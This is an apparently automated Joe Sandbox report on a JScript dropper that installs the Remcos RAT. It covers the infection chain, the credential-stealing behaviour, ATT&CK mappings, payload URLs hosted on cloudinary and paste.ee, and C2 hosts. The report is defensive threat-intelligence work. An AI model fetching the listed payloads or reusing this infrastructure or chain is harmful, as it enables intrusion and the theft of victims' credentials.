                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_00404915 GetLocalTime,CreateEventA,CreateThread | 10_2_00404915
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_0041A7A2 GetComputerNameExW,GetUserNameW | 10_2_0041A7A2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_0044800F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free | 10_2_0044800F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 11_2_0041739B GetVersionExW | 11_2_0041739B
                      Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

                      Source: Yara match | File source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0000000A.00000002.3636685740.0000000002BEF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000002.3633339065.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 7040, type: MEMORYSTR
                      Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data | 10_2_0040B21B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ | 10_2_0040B335
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: \key3.db | 10_2_0040B335
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\places.sqlite
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\key4.db
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Key opened: HKEY_CURRENT_USER\Software\Paltalk
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: ESMTPPassword12_2_004033F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword12_2_00402DB3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword12_2_00402DB3
                      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7040, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 5648, type: MEMORYSTR

Remote Access Functionality

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, mutex created: \Sessions\1\BaseNamedObjects\Rmc-QM0FWK
Source: Yara match, file source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0000000A.00000002.3636685740.0000000002BEF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 0000000A.00000002.3633339065.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: Process Memory Space: MSBuild.exe PID: 7040, type: MEMORYSTR
Source: Yara match, file source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, code function: cmd.exe (10_2_00405042)
MITRE ATT&CK Matrix (a number in brackets is the count of matching signatures for that technique; techniques without a count are matrix cells with no matching signature)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Scripting [22]; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: Native API [11]; Exploitation for Client Execution [1]; Command and Scripting Interpreter [32]; Service Execution [2]; PowerShell [3]; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: Scripting [22]; DLL Side-Loading [1]; Windows Service [1]; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: DLL Side-Loading [1]; Bypass User Account Control [1]; Access Token Manipulation [1]; Windows Service [1]; Process Injection [522]; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [3]; Software Packing [1]; DLL Side-Loading [1]; Bypass User Account Control [1]; Masquerading [1]; Virtualization/Sandbox Evasion [21]; Access Token Manipulation [1]; Process Injection [522]; Dynamic API Resolution
Credential Access: OS Credential Dumping [2]; Input Capture [211]; Credentials in Registry [2]; Credentials In Files [3]; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: System Time Discovery [2]; Account Discovery [1]; System Service Discovery [1]; File and Directory Discovery [3]; System Information Discovery [38]; Security Software Discovery [31]; Virtualization/Sandbox Evasion [21]; Process Discovery [4]; Application Window Discovery [1]; System Owner/User Discovery [1]
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: Archive Collected Data [11]; Data from Local System [1]; Email Collection [1]; Input Capture [211]; Clipboard Data [3]; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: Web Service [1]; Ingress Tool Transfer [12]; Encrypted Channel [21]; Non-Standard Port [1]; Remote Access Software [1]; Non-Application Layer Protocol [2]; Application Layer Protocol [113]; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot [1]; Defacement [1]; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Behavior Graph ID: 1575117, Sample: PO_0099822111ORDER.js, Start date: 14/12/2024, Architecture: WINDOWS, Score: 100

Top-level DNS/IP nodes: paste.ee; shed.dual-low.s-part-0035.t-0009.t-msedge.net; 7 other IPs or domains
Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 18 other signatures; Connects to a pastebin service (likely for C&C) (attached to paste.ee)

Process tree:

wscript.exe (started)
    Network: cloudinary.map.fastly.net 151.101.193.137 (ports 443, 49710, 49711), FASTLYUS, United States
    Dropped: C:\Windows\Temp\???2????4????4????5.js, ASCII
    Signatures: System process connects to network (likely due to code injection or exploit); JScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; 4 other signatures
    wscript.exe (started)
        Signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Windows Scripting host queries suspicious COM object (likely to drop second stage)
        powershell.exe (started)
            Signatures: Suspicious powershell command line found; Found suspicious powershell code related to unpacking or dynamic code loading
            conhost.exe (started)
            powershell.exe (started)
                Network: paste.ee 104.21.84.67 (ports 443, 49719), CLOUDFLARENETUS, United States
                Signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes
                MSBuild.exe (started)
                    Network: 160.25.73.25 (ports 49720, 49721, 6426), GIGAINFRASoftbankBBCorpJP, unknown; geoplugin.net 178.237.33.50 (ports 49722, 80), ATOM86-ASATOM86NL, Netherlands
                    Dropped: C:\ProgramData\remcos\logs.dat, data
                    Signatures: Detected Remcos RAT; Maps a DLL or memory area into another process; Installs a global keyboard hook
                    MSBuild.exe (started)
                        Signatures: Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file / registry access)
                    MSBuild.exe (started)
                        Signatures: Tries to harvest and steal browser information (history, passwords, etc)
                    MSBuild.exe (started)
                MSBuild.exe (started)
                    Signatures: Contains functionality to bypass UAC (CMSTPLUA); Tries to steal Mail credentials (via file registry); Contains functionality to change the wallpaper; 5 other signatures

Antivirus, Machine Learning and Genetic Malware Detection

Source | Detection | Scanner | Label
PO_0099822111ORDER.js | 15% | Virustotal | (no label)
PO_0099822111ORDER.js | 5% | ReversingLabs | Win32.Trojan.Generic

No Antivirus matches

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label
https://16f4635cf53944c2803a9fed55960f78.azr.footprintdns.com/apc/trans.gif?137019cd0ea2ea141b322d7a | 0% | Avira URL Cloud | safe
https://dfa120137745023a56578a045948e58c.clo.footprintdns.com/apc/trans.gif?e2a80f8d2c945664c83931e8 | 0% | Avira URL Cloud | safe
https://16f4635cf53944c2803a9fed55960f78.azr.footprintdns.com/apc/trans.gif?420dfb4adf33cca8e8445be7 | 0% | Avira URL Cloud | safe
https://dfa120137745023a56578a045948e58c.clo.footprintdns.com/apc/trans.gif?110eb0177c05b2ea3775fea8 | 0% | Avira URL Cloud | safe
ruffella.duckdns.org | 100% | Avira URL Cloud | malware
Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | (none) | high
paste.ee | 104.21.84.67 | true | false | (none) | high
geoplugin.net | 178.237.33.50 | true | false | (none) | high
cloudinary.map.fastly.net | 151.101.193.137 | true | false | (none) | high
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | (none) | high
fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | (none) | high
res.cloudinary.com | unknown | unknown | false | (none) | high

URLs

Name | Malicious | Antivirus Detection | Reputation
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg | false | (none) | high
https://res.cloudinary.com/dzakc3wag/raw/upload/v1734112417/uploaded_textfile | false | (none) | high
http://geoplugin.net/json.gp | false | (none) | high
https://paste.ee/r/iDcBt/0 | false | (none) | high
ruffella.duckdns.org | true | Avira URL Cloud: malware | unknown
URLs from Memory and Binary Strings

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.imvu.comr | MSBuild.exe, 0000000D.00000002.2753028227.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | (none) | high
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgX | powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://aefd.nelreports.net/api/report?cat=bingth | bhvFC84.tmp.11.dr | false | (none) | high
http://geoplugin.net/json.gp3 | MSBuild.exe, 0000000A.00000002.3633339065.0000000000F43000.00000004.00000020.00020000.00000000.sdmp | false | (none) | high
https://analytics.paste.ee | powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
http://www.nirsoft.net | MSBuild.exe, 0000000B.00000002.2761597224.0000000000EF4000.00000004.00000010.00020000.00000000.sdmp | false | (none) | high
https://aefd.nelreports.net/api/report?cat=bingaotak | bhvFC84.tmp.11.dr | false | (none) | high
https://deff.nelreports.net/api/report?cat=msn | bhvFC84.tmp.11.dr | false | (none) | high
https://16f4635cf53944c2803a9fed55960f78.azr.footprintdns.com/apc/trans.gif?137019cd0ea2ea141b322d7a | bhvFC84.tmp.11.dr | false | Avira URL Cloud: safe | unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | MSBuild.exe, 0000000D.00000002.2753028227.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | (none) | high
https://www.google.com | powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 0000000D.00000002.2753028227.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | (none) | high
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL | bhvFC84.tmp.11.dr | false | (none) | high
http://geoplugin.net/json.gp/C | MSBuild.exe, 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | (none) | high
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat | bhvFC84.tmp.11.dr | false | (none) | high
https://res.cloudinary.com/ | wscript.exe, 00000000.00000002.2993603208.00000137F14D7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2991947390.00000137F14CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2992820674.00000137F14D6000.00000004.00000020.00020000.00000000.sdmp | false | (none) | high
https://login.yahoo.com/config/login | MSBuild.exe | false | (none) | high
https://cdnjs.cloudflare.com | powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://cdnjs.cloudflare.com; | powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
http://www.nirsoft.net/ | MSBuild.exe, 0000000D.00000002.2753028227.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | (none) | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000004.00000002.2940617562.00000233DC3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2664935564.0000021680631000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://secure.gravatar.com | powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c& | bhvFC84.tmp.11.dr | false | (none) | high
https://www.office.com/ | bhvFC84.tmp.11.dr | false | (none) | high
https://res.cloudinary.com/dzakc3wag/raw/upload/v1734112417/uploaded_ | wscript.exe, 00000000.00000002.2993688674.00000137F3240000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2374286860.00000137F3428000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2991573495.00000137F3428000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2992223390.00000137F1428000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2993443782.00000137F1429000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2991758949.00000137F3428000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2993888591.00000137F3428000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2992154625.00000137F141B000.00000004.00000020.00020000.00000000.sdmp | false | (none) | high
https://dfa120137745023a56578a045948e58c.clo.footprintdns.com/apc/trans.gif?110eb0177c05b2ea3775fea8 | bhvFC84.tmp.11.dr | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://dfa120137745023a56578a045948e58c.clo.footprintdns.com/apc/trans.gif?e2a80f8d2c945664c83931e8 | bhvFC84.tmp.11.dr | false | Avira URL Cloud: safe | unknown
https://www.google.com; | powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
http://www.imvu.com | MSBuild.exe, MSBuild.exe, 0000000D.00000002.2753028227.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | (none) | high
https://aefd.nelreports.net/api/report?cat=wsb | bhvFC84.tmp.11.dr | false | (none) | high
https://github.com/Pester/Pester | powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgp | powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://res.cloudinary.com | powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://16f4635cf53944c2803a9fed55960f78.azr.footprintdns.com/apc/trans.gif?420dfb4adf33cca8e8445be7 | bhvFC84.tmp.11.dr | false | Avira URL Cloud: safe | unknown
https://aefd.nelreports.net/api/report?cat=bingaot | bhvFC84.tmp.11.dr | false | (none) | high
https://analytics.paste.ee; | powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg | bhvFC84.tmp.11.dr | false | (none) | high
https://aefd.nelreports.net/api/report?cat=bingrms | bhvFC84.tmp.11.dr | false | (none) | high
https://www.google.com/accounts/servicelogin | MSBuild.exe | false | (none) | high
https://aka.ms/pscore68 | powershell.exe, 00000004.00000002.2940617562.00000233DC3A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2940617562.00000233DC38B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2664935564.0000021680631000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
https://themes.googleusercontent.com | powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmp | false | (none) | high
http://www.ebuddy.com | MSBuild.exe, MSBuild.exe, 0000000D.00000002.2753028227.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | (none) | high
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5a& | bhvFC84.tmp.11.dr | false | (none) | high
https://res.cloudinary.com/dytflt61n/image/upload/v17 | powershell.exe, 00000004.00000002.2940185943.00000233DC2E6000.00000004.00000020.00020000.00000000.sdmp | false | (none) | high
                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                              151.101.193.137
                                                                                                                              cloudinary.map.fastly.netUnited States
                                                                                                                              54113FASTLYUSfalse
                                                                                                                              178.237.33.50
                                                                                                                              geoplugin.netNetherlands
                                                                                                                              8455ATOM86-ASATOM86NLfalse
                                                                                                                              104.21.84.67
                                                                                                                              paste.eeUnited States
                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                              160.25.73.25
                                                                                                                              unknownunknown
                                                                                                                              17676GIGAINFRASoftbankBBCorpJPtrue
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1575117
Start date and time: 2024-12-14 13:59:13 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 13s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: PO_0099822111ORDER.js
Detection: MAL
Classification: mal100.rans.spre.phis.troj.spyw.expl.evad.winJS@18/12@3/4
EGA Information:
• Successful, ratio: 80%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 141
• Number of non-executed functions: 309
Cookbook Comments:
• Found application associated with file extension: .js
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.198.119.84, 172.202.163.200, 2.22.50.131, 2.22.50.144, 192.229.221.95, 40.69.42.241, 199.232.210.172, 20.198.118.190, 20.12.23.50, 13.107.246.63
• Excluded domains from analysis (whitelisted): client.wns.windows.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, wns.notify.trafficmanager.net, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, azureedge-t-prod.trafficmanager.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
• Execution Graph export aborted for target powershell.exe, PID 7116 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
08:00:17 | API Interceptor | 73x Sleep call for process: powershell.exe modified
08:01:15 | API Interceptor | 1182108x Sleep call for process: MSBuild.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
151.101.193.137 | NB PO-104105107108.xls | Get hash | malicious | Unknown | Browse |
151.101.193.137 | stage2.ps1 | Get hash | malicious | PureLog Stealer, RevengeRAT, zgRAT | Browse |
151.101.193.137 | New Order Enquiry.js | Get hash | malicious | AgentTesla | Browse |
151.101.193.137 | greatnew.doc | Get hash | malicious | Remcos | Browse |
151.101.193.137 | https://link.mail.beehiiv.com/ss/c/SFMS2DGC_3bR2eTtelyfFUzhcGs9TWsEeQw8nQp279J9B9upNohe5IND2DzRg4GfFe3uzMCkwl0VCcFF4p9tdZ71PSC4SlxBXIoR6qgai_e9KXQu46yVwLcidRn-ax90dry5wHpUbN5t2kTBuqVHtjiUR148OM6f2kzv0FbM9-j2d8Pfv1aAiA8m-jIRZ1qPGcwv7cKHtg7zS7k4vguTCgqcLvbDJq61ZPMm3FUyJbd-2ROdV-1aYJVxlO48nGuxkYE6PJ8AjBLfTrwxiX4S2X3JBdpAgH-S1qPrWFIUFnwhW_rcr9w0IZhVJg2k6UwPe0XxcmVm_hXa3Zy0nKOCBvO11zW3IuzS0wT0aqoeUGhUZL_BJAovHWU-78ta_hn0kcmqrlBzh66Yb9lBLgDUfmEypG1yBWRlXPRZ1w7redaJaooKiPuwr2V5n8bXDS9_yWg2USHIOqCrcsTtBGYogmSv3HnV9rD8TCUiXo47xhMBVMzr7StZWjjgT4kZsxK7CX-zIn8YCCC8lkjyOEp6xgdXFjETIB4df5tQm7lBbPlCZ99btsVwezxOnJZ4MV1piJOH9CONfmhGD5405v_OGQ0ddDY5d31qqadrUj9T5uo/422/2hUrqrZHQZSMSqb_7MA2RQ/h1/bXAkiKjrMazQzzpENtDvosiaH2ZRcmZd0aMxcbDunvM | Get hash | malicious | Unknown | Browse |
151.101.193.137 | https://www.searchunify.com | Get hash | malicious | Unknown | Browse |
178.237.33.50 | requests-pdf.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | Documents.pdf | Get hash | malicious | Remcos, DBatLoader | Browse | geoplugin.net/json.gp
178.237.33.50 | x295IO8kqM.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | 7d74ApV4bb.exe | Get hash | malicious | Remcos, DBatLoader | Browse | geoplugin.net/json.gp
178.237.33.50 | greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta | Get hash | malicious | Cobalt Strike, Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | SwiftCopy_PaymtRecpt121224.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | WO-663071 Sabiya Power Station Project.vbs | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | 4JwhvqLe8n.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | fIPSLgT0lO.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | IXCbn4ZcdS.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
cloudinary.map.fastly.net | NB PO-104105107108.xls | Get hash | malicious | Unknown | Browse | 151.101.193.137
cloudinary.map.fastly.net | greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta | Get hash | malicious | Cobalt Strike, Remcos | Browse | 151.101.1.137
cloudinary.map.fastly.net | goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.hta | Get hash | malicious | Cobalt Strike, FormBook | Browse | 151.101.1.137
cloudinary.map.fastly.net | creamkissingthingswithcreambananapackagecreamy.hta | Get hash | malicious | Cobalt Strike, Remcos | Browse | 151.101.1.137
cloudinary.map.fastly.net | Cot90012ARCACONTAL.xls | Get hash | malicious | Remcos | Browse | 151.101.129.137
cloudinary.map.fastly.net | Euro confirmation Sp.xls | Get hash | malicious | Unknown | Browse | 151.101.1.137
cloudinary.map.fastly.net | stage2.ps1 | Get hash | malicious | PureLog Stealer, RevengeRAT, zgRAT | Browse | 151.101.193.137
cloudinary.map.fastly.net | nicegirlforyou.hta | Get hash | malicious | Cobalt Strike, Remcos | Browse | 151.101.1.137
cloudinary.map.fastly.net | invoice09850.xls | Get hash | malicious | Remcos | Browse | 151.101.65.137
cloudinary.map.fastly.net | Invoice A037.xls | Get hash | malicious | Unknown | Browse | 151.101.1.137
bg.microsoft.map.fastly.net | PAYMENT COPY_PDF.exe | Get hash | malicious | FormBook | Browse | 199.232.210.172
bg.microsoft.map.fastly.net | Shipment 990847575203.pdf.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 199.232.214.172
bg.microsoft.map.fastly.net | xu27D0L6Ak.exe | Get hash | malicious | DCRat | Browse | 199.232.210.172
